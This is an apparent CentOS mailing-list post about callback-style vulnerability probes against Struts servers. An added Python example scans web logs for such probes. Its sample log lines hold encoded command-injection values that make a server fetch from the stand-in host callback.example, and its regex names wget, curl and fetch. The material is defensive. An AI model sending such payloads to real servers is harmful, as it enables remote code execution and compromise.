[CentOS] Am I being too paranoid?

Mon May 9 16:43:46 UTC 2011
Les Mikesell <lesmikesell at gmail.com>

On 5/9/2011 11:09 AM, Scott Silva wrote:
> on 5/8/2011 10:46 AM Jason spake the following:
>> Hi All,
>>
>> I want to know thoughts on if I am being too paranoid/security conscious.
>>
> <snip>
> You know what they say;
> "Just because you are paranoid does not mean that someone is NOT out to get you!"

I think the currently fashionable way to probe for vulnerabilities is to 
send URLs that will execute something that will contact a central server 
if they succeed, so it doesn't really matter what you do in the way of 
blocking/redirecting, etc.  They are probably going to ignore the return 
status and are already running on distributed compromised hosts.  At 
least that's the sort of thing I see regularly trying to exploit a 
Struts vulnerability in our Java web server's logs.

-- 
   Les Mikesell
    lesmikesell at gmail.com
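
Added example, not part of the original message: one way to spot the callback-style probes described above in a web access log, flagging requests by what they ask the server to fetch rather than by the status returned. The log lines, the host `callback.example`, the `cmd` parameter and the fetch-tool list are constructed assumptions, not taken from the poster's logs.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [09/May/2011:16:01:02 +0000] "GET /app/list.action?cmd=wget+http%3A%2F%2Fcallback.example%2Fa HTTP/1.1" 404 210
203.0.113.9 - - [09/May/2011:16:01:40 +0000] "GET /app/list.action?cmd=curl%2Bhttp%253A%252F%252Fcallback.example%252Fb HTTP/1.1" 403 199
192.0.2.15 - - [09/May/2011:16:02:11 +0000] "GET /app/list.action?page=2 HTTP/1.1" 200 5120
192.0.2.15 - - [09/May/2011:16:02:30 +0000] "GET /go?next=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumed heuristic: a fetch tool name followed by a URL inside one parameter.
CALLBACK_RE = re.compile(r'\b(wget|curl|fetch)\b[^&]*?\bhttps?://([^/\s\'")&]+)', re.I)

def decode(target):
    """Undo up to three layers of percent-encoding (probes are often double-encoded)."""
    for _ in range(3):
        nxt = unquote_plus(target)
        if nxt == target:
            break
        target = nxt
    return target

def find_callback_probes(log_text):
    """Map each callback host to the source IPs and statuses of requests naming it."""
    hits = defaultdict(lambda: {"sources": set(), "statuses": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, target, status = m.group(1), m.group(3), m.group(4)
        _, _, query = decode(target).partition("?")
        cb = CALLBACK_RE.search(query)
        if cb:  # status is recorded for context but never used as a filter
            host = cb.group(2).lower()
            hits[host]["sources"].add(src)
            hits[host]["statuses"].add(status)
    return dict(hits)

if __name__ == "__main__":
    for host, info in find_callback_probes(SAMPLE_LOG).items():
        print(host, sorted(info["sources"]), sorted(info["statuses"]))
```

Grouping by callback host ties together probes arriving from unrelated source addresses. Checking outbound connection logs for the flagged hosts shows whether any probe actually succeeded.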